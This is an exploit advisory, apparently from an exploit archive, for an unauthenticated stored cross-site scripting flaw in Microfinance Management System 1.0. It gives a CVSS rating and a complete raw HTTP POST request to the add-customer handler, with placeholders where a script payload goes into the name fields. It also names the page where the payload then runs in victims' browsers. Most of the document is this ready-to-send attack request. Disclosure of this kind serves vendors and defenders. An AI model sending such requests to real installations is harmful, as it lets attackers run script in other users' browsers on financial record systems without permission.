# Exploit Title: Microfinance Management System 1.0 - Cross-site scripting
stored (unauthenticated)
# Date: 23/03/2022
# Exploit Author: Mr Empy
# Software Link:
https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Version: 1.0
# Tested on: Linux


Title:
================
Microfinance Management System 1.0 - Cross-site scripting stored
(unauthenticated)


Summary:
================
Microfinance Management System version 1.0 is affected by the Cross-site
Scripting vulnerability due to poor hygiene in certain parameters. The
attacker could take advantage of this flaw to inject arbitrary javascript
code to manipulate the victim's browser capabilities.


Severity Level:
================
6.5 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N


Affected Product:
================
Microfinance Management System v1.0


Steps to Reproduce:
================

1. Open a request repeater (like Burp Suite) and send this request:

POST /mims/app/addcustomerHandler.php HTTP/1.1
Host: target.com
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://target.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://target.com/mims/addcustomer.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

customer_number=335341988&customer_type=14465108&first_name=<XSS PAYLOAD
HERE>&middle_name=<XSS PAYLOAD HERE>&surname=<XSS PAYLOAD
HERE>&nationality=Tanzanian&date_of_birth=2000-01-01&gender=O&addcustomer=

You can find your XSS payload in the /mims/managecustomer.php endpoint.